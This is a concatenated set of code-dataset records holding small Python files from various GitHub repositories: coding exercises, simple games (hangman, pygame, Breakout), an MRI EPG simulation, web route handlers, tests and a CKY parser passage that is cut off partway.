main()\n","repo_name":"vadimegorov13/owari_minmax","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"2861468589","text":"class Solution:\n def canJump(self,nums):\n '''\n :type nums:list[int]\n :rtype:bool\n '''\n if not nums: return\n i = len(nums)-2\n while i >= 0:\n if nums[i] == 0:\n needJumps = 1\n while needJumps > nums[i]:\n needJumps += 1;i -= 1\n if i < 0:\n return False\n i -= 1\n return True\ns = Solution()\nresult = s.canJump([3,2,1,0,4])\nprint(result)","repo_name":"nihao-hit/leetcode","sub_path":"Jump Game.py","file_name":"Jump Game.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"74173898556","text":"from replit import clear\nimport random\n\nfrom hangman_words import word_list\n\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\n\nend_of_game = False\nlives = 6\n\nfrom hangman_art import logo\nprint(logo)\n\ndisplay = []\nfor _ in range(word_length):\n display += \"_\"\n\nwhile not end_of_game:\n guess = input(\"Угадайте букву: \").lower()\n\n clear()\n \n if guess in display:\n print(f\"Вы уже угадали букву {guess}\")\n\n #Check guessed letter\n for position in range(word_length):\n letter = chosen_word[position]\n \n if letter == guess:\n display[position] = letter\n\n \n if guess not in chosen_word:\n \n print(f\"Вы ввели {guess}, но такой буквы нет в слове. У вас уменьшилась жизнь.\")\n \n lives -= 1\n if lives == 0:\n end_of_game = True\n print(\"Вы проиграли :(.\")\n print(f\"Слово было\\n{chosen_word}\")\n\n print(f\"{' '.join(display)}\")\n\n if \"_\" not in display:\n end_of_game = True\n print(\"Вы выиграли!.\")\n\n from hangman_art import stages\n print(stages[lives])\n","repo_name":"fsaidov11/Visielitsa","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18015976268","text":"\nimport random\n\ndef get_n_random_numbers(n=10,min_=-5,max_=5):\n numbers=[]\n for i in range(n):\n numbers.append(random.randint(min_,max_))\n return numbers\n\ndef my_frequency_with_dict(list):\n frequency_dict={}\n for item in list:\n if(item in frequency_dict):\n frequency_dict[item] = frequency_dict[item]+1\n else:\n frequency_dict[item] = 1\n return frequency_dict\n\nmy_list = get_n_random_numbers(10,-8,8)\nsorted(my_list)\nmy_f=my_frequency_with_dict(my_list)\nprint(my_list)\nprint(my_f)\n\n\ndef my_frequency_with_list_of_tuples(list_1):\n frequency_list = []\n for i in range(len(list_1)):\n s=False\n for j in range(len(frequency_list)):\n if(list_1[i]==frequency_list[j][0]):\n frequency_list[j][1]=frequency_list[j][1]+1\n s=True\n if(s==False):\n frequency_list.append([list_1[i],1])\n return frequency_list\n\nresult_1 = my_frequency_with_dict(my_list)\nresult_2 = my_frequency_with_list_of_tuples(my_list)\nprint(result_1,result_2)\n\n\n\n\n\n# mode of a list with histogram\n\ndef my_mode_with_dict(my_hist_d):\n frequency_max = -1\n mode = -1\n for key in my_hist_d.keys():\n print(key,my_hist_d[key])\n if(my_hist_d[key]>frequency_max):\n frequency_max = my_hist_d[key]\n mode=key\n return mode,frequency_max\n\nmy_list_1 = get_n_random_numbers(10)\nmy_hist_d = my_frequency_with_dict(my_list_1)\nmy_hist_l=my_frequency_with_list_of_tuples(my_list_1)\n\nprint(my_mode_with_dict(my_hist_d))\n\n\n\n\n\n# mode of a list with histogram (a list of tuples)\n\ndef my_mode_with_list(my_hist_list):\n frequency_max = -1\n mode = -1\n for item,frequency in my_hist_list:\n print(item,frequency)\n if(frequency>frequency_max):\n frequency_max = frequency\n mode=item\n return mode,frequency_max\n\nmy_list_100 = get_n_random_numbers(20,-4,4)\nmy_hist_l=my_frequency_with_list_of_tuples(my_hist_l)\nprint(my_mode_with_list(my_hist_l))\n\n\n\n\n#linear search on list\n\ndef my_linear_searh(my_list,item_search):\n found=(-1,-1)\n n=len(my_list)\n for indis in range(n):\n if my_list[indis] == item_search:\n found=(my_list[indis],indis)\n return found\n\nmy_list = get_n_random_numbers(10,-5,5)\nprint(my_linear_searh(my_list,10))\n\n\n#mean of list\n\ndef my_mean():\n s,t=0,0\n for item in my_list:\n s=s+1\n t=t+item\n mean_ = t/s\n return mean_\n\nmy_list = get_n_random_numbers(4,-5,5)\nprint(my_mean(my_list))\n\n\n\n\n#sort the list\n\ndef my_bubble_sort(my_list):\n n=len(my_list)\n for i in range(n-1,-1,-1):\n for j in range(0,i):\n if not(my_list[j]item_search):\n high = mid-1\n else:\n low=mid+1\n return found\n\n\n\n#median of a list\n\nsize=input(\"dizi boyutunu giriniz\")\nsize=int(size)\nmy_list_1=get_n_random_numbers(size)\n\nprint(\"liste \",my_list_1)\n\ndef my_median(my_list):\n my_list_2 = my_bubble_sort(my_hist_l)\n #print(my_list_2)\n n=len(my_list_2)\n if(n%2==1):\n middle=int(n/2)+1\n median = my_list_2[middle-1]\n #print(median)\n\n else:\n middle_1= int(n/2)\n middle_2= middle_1+1\n median= (my_list_2[middle_1]+my_list_2[middle_2])/2\n #print(median)\n return median\n\nmy_list_2 = get_n_random_numbers(5,-10,10)\nprint(my_median(my_list_2))\n\n\n\n\n\n","repo_name":"akifselbii/SchoolProjects","sub_path":"ProgramlamaDersi/algs_week_1/algs_week_1.py","file_name":"algs_week_1.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11251729266","text":"# [게임 조건]\n# 1. 캐릭터는 화면 가장 아래에 위치, 좌우로만 이동 가능\n# 2. 똥은 화면 가장 위에서 떨어짐. x 좌표는 매번 랜덤으로 설정\n# 3. 캐릭터가 똥을 피하면 다음 똥이 떨어짐\n# 4. 캐릭터가 똥과 충돌하면 게임 종료\n# 5. FPS는 30으로 고정\n\n# [게임 이미지]\n# 1. 배경 640 * 480 (세, 가)\n# 2. 캐릭터, 똥 70 * 70\n###############################################################################\n\nfrom turtle import screensize\nimport pygame\nimport random as r\n\npygame.init() #초기화 (반드시 필요한 작업)\n\n#화면 크기 설정\nscreen_width = 480\nscreen_height = 640\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n#화면 제목 설정\npygame.display.set_caption(\"따라 만든 게임 1\")\n\n# FPS\nclock = pygame.time.Clock()\n\n# 1. 사용자 게임 초기화 (배경 화면, 게임 이미지, 폰트, 좌표 etc...)\n\n#배경 불러오기\nbackground = pygame.image.load(\"C:/python master/bg.png\")\n\n#캐릭터 불러오기\ncharacter = pygame.image.load(\"C:/python master/char.png\")\ncharacter_size = character.get_rect().size\ncharacter_width = character_size[0]\ncharacter_height = character_size[1]\ncharacter_x_pos = (screen_width / 2) - (character_width / 2)\ncharacter_y_pos = screen_height - character_height\n\n#이동할 좌표\nto_x = 0\nto_y = 0\n\n#이동 속도\ncharacter_speed = 0.6\nenemy_speed = r.randint(1,10)\n\n# 적 캐릭터\n\nenemy = pygame.image.load(\"C:/python master/enemy.png\")\nenemy_size = enemy.get_rect().size\nenemy_width = enemy_size[0]\nenemy_height = enemy_size[1]\nenemy_x_pos = r.randint(0, screen_width - enemy_width)\nenemy_y_pos = 0\n\n# 폰트 정의\ngame_font = pygame.font.Font(None, 40)\n\n# 이벤트 루프\nrunning = True\nwhile running:\n dt = clock.tick(30) #초당 프레임 수 설정\n print(\"fps: \" + str(clock.get_fps()))\n\n#2. 이벤트 처리 (키보드, 마우스 etc...) \n for event in pygame.event.get(): #어떤 이벤트가 발생하였는가?\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n to_x -= character_speed\n elif event.key == pygame.K_RIGHT:\n to_x += character_speed\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n to_x = 0\n\n# 3. 게임 캐릭터 위치 정의 \n character_x_pos += to_x * dt\n enemy_y_pos += 10\n \n if character_x_pos < 0:\n character_x_pos = 0\n elif character_x_pos > screen_width - character_width:\n character_x_pos = screen_width - character_width\n \n if enemy_y_pos > screen_height:\n enemy_y_pos = 0\n enemy_x_pos = r.randint(0, screen_width - enemy_width)\n \n# 4. 충돌 처리\n character_rect = character.get_rect()\n character_rect.left = character_x_pos\n character_rect.top = character_y_pos\n \n enemy_rect = enemy.get_rect()\n enemy_rect.left = enemy_x_pos\n enemy_rect.top = enemy_y_pos\n \n # 충돌 확인\n if character_rect.colliderect(enemy_rect):\n print(\"충돌했습니다.\")\n running = False\n \n# 5. 화면에 그리기 \n screen.blit(background, (0,0)) \n screen.blit(character, (character_x_pos, character_y_pos)) \n screen.blit(enemy, (enemy_x_pos, enemy_y_pos)) # 적 그리기\n \n pygame.display.update()\n\npygame.time.delay(500)\n\npygame.quit()","repo_name":"Clue03/Falling-Block","sub_path":"Pygame/pygame_basic/Quiz_Answer.py","file_name":"Quiz_Answer.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74419838076","text":"import numpy as np\n\nfrom numpy import pi\n\nfrom matplotlib import pyplot as plt\nimport epg\nfrom epg import cpmg_epg, cpmg_epg_b1\nimport timeit\n\ndef epg_grad(FpFmZ, noadd=0):\n# if noadd == 0:\n# FpFmZ = np.concatenate((FpFmZ,np.zeros((3,1))), axis=1)\n\n FpFmZ[0,:] = np.roll(FpFmZ[0,:], 1)\n FpFmZ[1,:] = np.roll(FpFmZ[1,:],-1)\n FpFmZ[1,-1] = 0\n FpFmZ[0,0] = np.conjugate(FpFmZ[1,0])\n\n return(FpFmZ)\n\n\ndef epg_grelax( FpFmZ, T1, T2, T, kg = 0, D = 0, Gon = 1, noadd = 0):\n\n E1 = np.exp(-T/T1)\n E2 = np.exp(-T/T2)\n\n EE = np.diag([E2, E2, E1])\n RR = 1.0-E1\n\n FpFmZ = np.dot( EE, FpFmZ)\n\n FpFmZ[2,0] = FpFmZ[2,0]+RR\n\n# print(EE)\n# print('RR=',RR)\n# print('FpFmZ=\\n',FpFmZ[:,:4].real)\n\n ##Assume Gradient is on and kg >= 0\n\n FpFmZ = epg_grad(FpFmZ, noadd)\n\n\n return(FpFmZ)\n\n\ndef epg_rf( FpFmZ, alpha, phi ):\n\n RR = np.zeros((3,3), dtype = np.complex128)\n\n RR[0,0] = np.cos(alpha/2.)**2\n RR[0,1] = np.exp(2.0*1j*phi)*(np.sin(alpha/2.0))**2\n RR[0,2] = -1j*np.exp(1j*phi)*np.sin(alpha)\n\n RR[1,0] = np.exp(-2j*phi)*(np.sin(alpha/2.0))**2\n RR[1,1] = (np.cos(alpha/2.0))**2\n RR[1,2] = 1j*np.exp(-1j*phi)*np.sin(alpha)\n\n RR[2,0] = (-1j/2.0)*np.exp(-1j*phi)*np.sin(alpha)\n RR[2,1] = ( 1j/2.0)*np.exp( 1j*phi)*np.sin(alpha)\n RR[2,2] = np.cos(alpha)\n\n FpFmZ = np.dot(RR, FpFmZ)\n\n return( FpFmZ, RR)\n\n\ndef rf_pulse( alpha, phi ):\n\n RR = np.zeros((3,3), dtype = np.complex128)\n\n RR[0,0] = np.cos(alpha/2.)**2\n RR[0,1] = np.exp(2.0*1j*phi)*(np.sin(alpha/2.0))**2\n RR[0,2] = -1j*np.exp(1j*phi)*np.sin(alpha)\n\n RR[1,0] = np.exp(-2j*phi)*(np.sin(alpha/2.0))**2\n RR[1,1] = (np.cos(alpha/2.0))**2\n RR[1,2] = 1j*np.exp(-1j*phi)*np.sin(alpha)\n\n RR[2,0] = (-1j/2.0)*np.exp(-1j*phi)*np.sin(alpha)\n RR[2,1] = ( 1j/2.0)*np.exp( 1j*phi)*np.sin(alpha)\n RR[2,2] = np.cos(alpha)\n\n\n return(RR)\n\ndef cpmg_epg_py( Nechos=17, rf_180=120.0, T1=3000.0, T2=50.0, Techo=10.0 ):\n\n\n P = np.zeros((3,2*Nechos),dtype=np.complex128)\n\n P[0,0] = 0.0 # Fp\n P[1,0] = 0.0 # Fm\n P[2,0] = 1.0 # Z\n\n signal = np.zeros(Nechos)\n\n rf_pulse90_rad = np.pi*rf_180/360.\n #rf_pulse90_rad = np.pi*90.0/180.\n rf_pulse_rad = np.pi*rf_180/180.\n\n RR90 = rf_pulse(rf_pulse90_rad, np.pi/2.0)\n RR180 = rf_pulse(rf_pulse_rad, 0.0)\n\n P = np.dot( RR90, P )\n #signal[0] = P[0,0].real\n\n for echo in range(Nechos):\n P = epg_grelax( P, T1, T2, Techo/2.0)\n P = np.dot(RR180,P)\n P = epg_grelax( P, T1, T2, Techo/2.0)\n\n signal[echo] = (P[0,0].real)\n\n return(signal)\n\n\n\nif __name__ == \"__main__\":\n\n Nechos=17\n T1=3000.0\n T2=50.0\n T = 10.0\n P180 = 120.0\n\n signal = np.zeros(Nechos)\n #signal = [0.0]*Nechos\n xxx = np.arange( T, T*(Nechos+1), T )\n\n #xxx = np.arange(1,18)*10.0\n yyy = np.zeros(17, dtype=np.float64)\n\n ttt_c = timeit.timeit('cpmg_epg_b1( yyy, 60.0, 120.0, 3000.0, 50.0, 10.0, 1.0 )', setup=\"from __main__ import cpmg_epg_b1, yyy, pi\", number=10000)\n ttt_c = timeit.timeit('cpmg_epg_b1( yyy, 60.0, 120.0, 3000.0, 50.0, 10.0, 1.0 )', setup=\"from __main__ import cpmg_epg_b1, yyy, pi\", number=10000)\n print(\"Time to execute cpmg_epg_b1 C++ function 10000 times: {:5.2f} s\".format( ttt_c))\n\n ttt_py = timeit.timeit('cpmg_epg_py( Nechos=17, rf_180=120.0, T1=3000.0, T2=50.0, Techo=10.0 )', setup=\"from __main__ import cpmg_epg_py\", number=10000)\n print(\"Time to execute cpmg_ep python function 10000 times: {:5.2f} s\".format( ttt_py))\n\n print(\"Ratio of Python to C++ {:5.2f}\".format(ttt_py/ttt_c))\n epg.cpmg_epg( yyy, 60.0, 120.0, 3000.0, 50.0, 10.0 )\n\n yyy_py = cpmg_epg_py( Nechos=17, rf_180=120.0, T1=3000.0, T2=50.0, Techo=10.0 )\n\n\n print(help(cpmg_epg_b1))\n\n plt.plot(xxx, yyy, 'o-', label='c')\n plt.plot(xxx, yyy_py, label ='py')\n plt.xlabel('time [ms]')\n plt.ylabel('signal')\n plt.title( 'RF pulse = 120$^o$ speed up factor {:5.2f}'.format(ttt_py/ttt_c))\n plt.legend()\n plt.show();","repo_name":"EricHughesABC/EPG","sub_path":"examples/run_epg.py","file_name":"run_epg.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"5877948501","text":"#!/usr/bin/env python\nimport argparse\n\nparser = argparse.ArgumentParser(description='kawazanyou')\n\nparser.add_argument('-i', '--initial',\n required=True,\n type=int,\n help='Initial value')\nparser.add_argument('-r', '--rate',\n required=True,\n type=int,\n help='Annual interest rate')\nparser.add_argument('-s', '--saving',\n required=True,\n type=int,\n help=\"Annual saving\")\nparser.add_argument('-t', '--term',\n required=True,\n type=int, help=\"term\")\nparser.add_argument('-d', '--debug',\n required=False,\n action='store_true',\n help=\"debug mode\")\n\n\nargs = parser.parse_args()\n\ninitial = args.initial\nrate = args.rate\nsaving = args.saving\nterm = args.term\ndebug = args.debug\n\n\nif debug:\n print('initial : {}'.format(initial))\n print('rate : {} %'.format(rate))\n print('saving : {}'.format(saving))\n print('term : {} year'.format(term))\n\nactual = initial\n\nprint('year, actual, profit')\n\nfor var in range(0, term):\n total_saving_amount = saving * 12\n actual += total_saving_amount\n profit = actual * (rate / 100)\n actual += profit\n print('{},{},{}'.format(var, actual, profit))\n","repo_name":"nasum/python-scripts","sub_path":"kawazanyou/kawazanyou.py","file_name":"kawazanyou.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"201876287","text":"import copy\nimport logging\nfrom datetime import datetime\n\nfrom autologging import traced\nfrom fastapi import Form\nfrom starlette.responses import HTMLResponse\n\nfrom api import autils\nfrom app import APP\nfrom core.use_cases.zacni_vclanitveni_postopek import Zacni_vclanitveni_postopek, StatusVpisa\n\nrouter = autils.router(__name__)\nlog = logging.getLogger(__name__)\n\n\n@traced\n@router.post(\"/vpis\", response_class=HTMLResponse)\nasync def vpis(\n\t\time: str = Form(min_length=2), priimek: str = Form(min_length=2),\n\t\tdan_rojstva: int = Form(ge=1, le=31), mesec_rojstva: int = Form(ge=1, le=12),\n\t\tleto_rojstva: int = Form(ge=datetime.now().year - 120, le=datetime.now().year),\n\t\temail: str = Form(min_length=3), telefon: str = Form(min_length=4),\n\t\time_skrbnika: str | None = Form(None, min_length=2), priimek_skrbnika: str | None = Form(None, min_length=2),\n\t\temail_skrbnika: str | None = Form(None, min_length=3), telefon_skrbnika: str | None = Form(None, min_length=3)):\n\tkwargs = copy.copy(locals())\n\n\tforms_vpis: Zacni_vclanitveni_postopek = APP.use_case.zacni_vclanitveni_postopek()\n\n\tstatus: StatusVpisa = await forms_vpis.exe(**kwargs)\n\tlog.info(status)\n\n\ttemp = template.init(**{**kwargs, **{'kontakti': [k.token_data for k in status.validirani_podatki]}})\n\tif TipPrekinitveVpisa.HACKER in status.razlogi_prekinitve:\n\t\treturn HTMLResponse(content=temp.warn_prekrsek, status_code=400)\n\telif TipPrekinitveVpisa.NAPAKE in status.razlogi_prekinitve:\n\t\ttemp.napake = [k.token_data for k in status.napacni_podatki_skrbnika + status.napacni_podatki_clana]\n\t\treturn HTMLResponse(content=temp.warn_napaka, status_code=400)\n\telif TipPrekinitveVpisa.CHUCK_NORIS in status.razlogi_prekinitve:\n\t\treturn HTMLResponse(content=temp.warn_chuck_noris)\n\n\t# POSILJANJE POTRDITVENEGA EMAILA\n\treturn HTMLResponse(content=temp.web_vpis_sprejeto, status_code=200)\n\n\n@traced\n@router.post(\"/izpis\")\ndef izpis():\n\treturn {}\n\n\n@traced\n@router.post('/kontakt')\ndef kontakt():\n\treturn {'kontakt': True}\n","repo_name":"Programerski-klub-Ljubljana/API_programerski-klub.si-deprecated-","sub_path":"api/routes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18816517575","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.utils.translation import get_language\nfrom app_projects.models import Project\nfrom app_cms.utils.revers_path import revers_page_path\nimport json\n\ndef group_technologies_by_type(technologies):\n technology_grouped = {}\n for tech in technologies:\n group = technology_grouped.get(tech.type.name, [])\n group.append(tech)\n technology_grouped[tech.type.name] = group\n return technology_grouped\n\ndef process(request, config, context, *args):\n slug = args[0][0]\n lang = get_language()\n\n\n projects = Project.objects.filter(translations__slug=slug, translations__language_code=lang)\n\n if not slug or not len(projects):\n path = '/'.join(request.path.split('/')[:-1])\n return {\n 'redirect': path\n }\n\n project = projects[0]\n\n context['project'] = project\n context['project_technologies'] = group_technologies_by_type(projects[0].technology.all().order_by('type__weight'))\n if project.meta_title and project.meta_description:\n context['page_meta'] = {\n 'meta_title': project.meta_title,\n 'meta_description': project.meta_description,\n 'title': project.title,\n 'locale': get_language(),\n 'image': {\n 'url': project.gallery.images[0].image.thumb,\n 'type': 'image/png',\n 'width': project.gallery.images[0].width,\n 'height': project.gallery.images[0].height,\n 'alt': project.gallery.images[0].alt,\n }\n }\n context['json_ld'] = project.json_ld\n return context","repo_name":"robert8888/portfolio","sub_path":"app_projects/views/section_project.py","file_name":"section_project.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42015349264","text":"# Faça um programa que leia o peso de cinco pessoas.\r\n# No final, mostre qual foi o maior e o menor peso lidos.\r\nc = 0\r\nmaiorpeso = 0\r\nmenorpeso = 1000\r\nfor pers in range(1, 6):\r\n c += 1\r\n peso = float(input(f'Quanto a {c}° pessoa pesa?: '))\r\n print('-'*33)\r\n if peso > maiorpeso:\r\n maiorpeso = peso\r\n\r\n if peso < menorpeso:\r\n menorpeso = peso\r\n\r\nprint(f'O maior peso digitador foi: \\033[31m{maiorpeso}kg\\033[m \\nO menor peso digitado foi: \\033[31m{menorpeso}kg\\033[m')\r\n","repo_name":"MattDF4/Curso-em-Video-Python-ex","sub_path":"Ex- 055.py","file_name":"Ex- 055.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7385322280","text":"#!/usr/bin/python3\n\nimport multiprocessing as mp\nimport os\nimport random\nimport time\n\ndef go_sleep():\n value = random.randrange(1, 10)\n time.sleep(value)\n print(\"[%d] awoken after %ds\" % (mp.current_process().pid, value))\n\npool = [mp.Process(target=go_sleep) for _ in range(10)]\n\nfor elt in pool:\n elt.start()\n\nfor _ in range(10):\n pid, _ = os.wait()\n print(\"[prnt] process %d done\" % (pid))\n\nfor elt in pool:\n elt.join()","repo_name":"uvsq22101252/Python_semestre_4","sub_path":"IN405/TD5/corection/easy-msleep.py","file_name":"easy-msleep.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9370378137","text":"\"\"\"\nTesting of the iterative module\n\n\"\"\"\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_allclose\n\nimport pyoperators\nfrom pyoperators import IdentityOperator\nfrom pyoperators.iterative.algorithms import acg\nfrom pyoperators.iterative.cg import PCGAlgorithm, pcg\nfrom pyoperators.utils.testing import assert_same\n\n# collection of definite positive symmetric linear operators to test\nOPERATORS = [\n pyoperators.DiagonalOperator(np.random.rand(16)),\n pyoperators.TridiagonalOperator(np.arange(1, 17), np.arange(1, 16)),\n]\n\n# collection of vectors\nVECTORS = [np.ones(16), np.arange(1, 17)]\n\n# collection of old solvers\nMETHODS = [acg]\n\n# collection of solvers\nCLASSES = [PCGAlgorithm]\nSOLVERS = [pcg]\n\n\n@pytest.mark.xfail(reason='reason: Unknown.')\n@pytest.mark.parametrize('operator', OPERATORS)\n@pytest.mark.parametrize('vector', VECTORS)\n@pytest.mark.parametrize('method', METHODS)\ndef test_methods_inv(operator, vector, method):\n y = operator * vector\n xe = method(operator, y, maxiter=100, tol=1e-7)\n assert_same(vector, xe)\n\n\n@pytest.mark.parametrize('operator', OPERATORS)\n@pytest.mark.parametrize('vector', VECTORS)\n@pytest.mark.parametrize('cls', CLASSES)\ndef test_classes_inv(operator, vector, cls):\n y = operator(vector)\n algo = cls(operator, y, maxiter=100, tol=1e-7)\n xe = algo.run()\n assert_allclose(vector, xe, rtol=1e-5)\n\n\n@pytest.mark.parametrize('solver', SOLVERS)\n@pytest.mark.parametrize('vector', VECTORS)\ndef test_solution_as_x0(solver, vector):\n solution = solver(IdentityOperator(shapein=vector.shape), vector, x0=vector)\n assert_same(solution['nit'], 0)\n assert_same(solution['x'], vector)\n","repo_name":"pchanial/pyoperators","sub_path":"tests/test_iterative.py","file_name":"test_iterative.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"96"} +{"seq_id":"10019703837","text":"\"\"\"\nstanCode Breakout Project\nAdapted from Eric Roberts's Breakout by\nSonja Johnson-Yu, Kylie Jue, Nick Bowman,\nand Jerry Liao.\n\nHand-in person: Jacky\n\"\"\"\n\nfrom campy.gui.events.timer import pause\nfrom breakoutgraphics import BreakoutGraphics\n\nFRAME_RATE = 10 # 100 frames per second\nNUM_LIVES = 3\t\t\t# Number of attempts\n\n# import moving step from Class\nvx = BreakoutGraphics.get_vx()\nvy = BreakoutGraphics.get_vy()\n\n\ndef main():\n \"\"\"\n After run the program, a window with bricks, a ball, and a paddle will be shown. The game can be started once\n gamer click his/her mouse. The ball will be dropped in a random direction and gamer needs to prevent the ball drops\n out the bottom edge of the window. Once the ball has dropped out the window, it will return back to its original\n position waiting next click to start. The player has 3 chances to eliminate all bricks to win the game.\n \"\"\"\n global vx, vy\n graphics = BreakoutGraphics()\n lives = NUM_LIVES\n brick_remain = graphics.brick_num\n\n while True:\n if lives > 0 and graphics.switch is True:\n graphics.ball.move(vx, vy)\n # set boundary conditions for top, left, and right edges\n if graphics.ball.x+graphics.ball.width > graphics.window.width or graphics.ball.x < 0:\n vx = -vx\n if graphics.ball.y < 0:\n vy = -vy\n # set boundary condition for bottom edge and reset the game once player fail to catch the ball\n elif graphics.ball.y > graphics.window.height:\n graphics.switch = False\n graphics.window.remove(graphics.ball)\n graphics.window.add(graphics.ball, x=(graphics.window.width-graphics.ball.width)/2,\n y=(graphics.window.height-graphics.ball.height)/2)\n vx = BreakoutGraphics.get_vx()\n lives -= 1\n\n # rebound condition and erase bricks if the ball hit them and rebound if hit the paddle\n flag = False\n for i in range(2):\n if flag is True:\n break\n for j in range(2):\n obj = graphics.window.get_object_at(graphics.ball.x + i*graphics.ball.width, graphics.ball.y +\n j*graphics.ball.height)\n if obj is not None:\n if obj is graphics.paddle:\n vy = -BreakoutGraphics.get_vy()\n else:\n graphics.window.remove(obj)\n brick_remain -= 1\n rebound()\n flag = True\n break\n\n if brick_remain == 0:\n break\n\n pause(FRAME_RATE)\n\n\ndef rebound():\n \"\"\"\n rebound function\n \"\"\"\n global vx, vy\n vy = -vy\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jackywu23/project-stanCode","sub_path":"Stancode_project/Breakout game/breakout.py","file_name":"breakout.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26663142663","text":"\"\"\"\r\nKim Dodds - LING 571 - Winter 2020\r\nHW 4 Implementation File\r\n\r\nThe purpose of this project is to implement\r\na CYK parser for a fragment of the ATIS corpus.\r\n\"\"\"\r\n\r\n#PREPROCESSOR DIRECTIVES\r\nimport sys\r\nimport os\r\nimport re\r\nimport nltk\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom collections import Counter\r\nimport math\r\n\r\nclass CKYIndex:\r\n index = None\r\n terminal = None\r\n nonterminal = None\r\n\r\n def __init__(self):\r\n self.index = []\r\n self.terminal = ''\r\n self.nonterminal = []\r\n\r\nclass CKYParser:\r\n left_right = None\r\n right_left = None\r\n\r\n def __init__(self):\r\n self.left_right = {}\r\n self.right_left = {}\r\n self.probabilities = Counter()\r\n self.vocab = Counter()\r\n self.output = None\r\n self.top = None\r\n\r\n def initialize_grammar(self, raw_grammar):\r\n grammar = raw_grammar.strip(\" \").split('\\n')\r\n if \"%start\" in grammar[0]:\r\n self.top = grammar[0].split(\" \")[1]\r\n for g in grammar:\r\n g = g.split(' -> ')\r\n if len(g) > 1:\r\n left = g[0]\r\n temp = g[1].split(\" \")\r\n if len(temp) == 2:\r\n right = temp[0].strip(\"'\")\r\n self.vocab[right] = 1\r\n prob = float(temp[1].strip(\"[]\"))\r\n else:\r\n right = temp[0] + \" \" + temp[1]\r\n prob = float(temp[2].strip(\"[]\"))\r\n self.probabilities[(left + \" -> \" + right)] = math.log(prob, 10)\r\n if left not in self.left_right:\r\n self.left_right[left] = []\r\n if right not in self.left_right[left]:\r\n self.left_right[left].append(right)\r\n if right not in self.right_left:\r\n self.right_left[right] = []\r\n if left not in self.right_left[right]:\r\n self.right_left[right].append(left)\r\n\r\n return\r\n\r\n def initialize_table(self, tokens):\r\n tokens = list(filter(None, tokens))\r\n table = np.empty( (len(tokens), len(tokens)), dtype=object )\r\n i = 0\r\n while i < len(tokens):\r\n if self.vocab[tokens[i]] != 1:\r\n self.output.write(\"\\n\")\r\n return\r\n table[i,i] = CKYIndex()\r\n table[i,i].terminal = tokens[i]\r\n table[i,i].index = [i,i+1]\r\n i += 1\r\n\r\n return self.parse(table)\r\n\r\n def parse(self, table):\r\n row = 0\r\n col = 0\r\n while col < len(table[0,:]):\r\n while row >= 0:\r\n if row == col:\r\n term = table[row,col].terminal\r\n for nt in self.right_left[term]:\r\n table[row,col].nonterminal.append((nt,\"(\"+nt+\" \"+term+\")\", self.probabilities[nt+\" -> \"+term]))\r\n else:\r\n table[row,col] = CKYIndex()\r\n table[row,col].index = [row,col+1]\r\n ctemp = col - 1\r\n rtemp = col\r\n while rtemp != row:\r\n index1 = table[row, ctemp]\r\n index2 = table[rtemp, col]\r\n for i in index1.nonterminal:\r\n for j in index2.nonterminal:\r\n production = i[0] + \" \" + j[0]\r\n if production in self.right_left:\r\n for lhs in self.right_left[production]:\r\n rule = lhs + \" -> \" + production\r\n table[row,col].nonterminal.append((lhs,\"(\"+lhs+\" \"+i[1]+\" \"+j[1]+\")\", self.probabilities[rule] + i[2] + j[2]))\r\n ctemp -= 1\r\n rtemp -= 1\r\n\r\n row -= 1\r\n col += 1\r\n row = col\r\n\r\n parses = []\r\n for top in table[0,col-1].nonterminal:\r\n if top[0] == self.top: parses.append(top[1])\r\n return self.output_parses(parses)\r\n\r\n def output_parses(self, parses):\r\n if len(parses) < 1:\r\n self.output.write(\"\\n\")\r\n else:\r\n parses = sorted(parses, key=lambda x:x[2], reverse=True)\r\n self.output.write(parses[0]+'\\n')\r\n return\r\n\r\n#MAIN FUNCTION\r\ndef main():\r\n grammar = open(sys.argv[1]).read().strip()\r\n test = open(sys.argv[2]).read().strip()\r\n output = open(sys.argv[3], 'w')\r\n\r\n CKY = CKYParser()\r\n CKY.output = output\r\n CKY.initialize_grammar(grammar)\r\n\r\n for line in test.split('\\n'):\r\n l = line.split(' ')\r\n 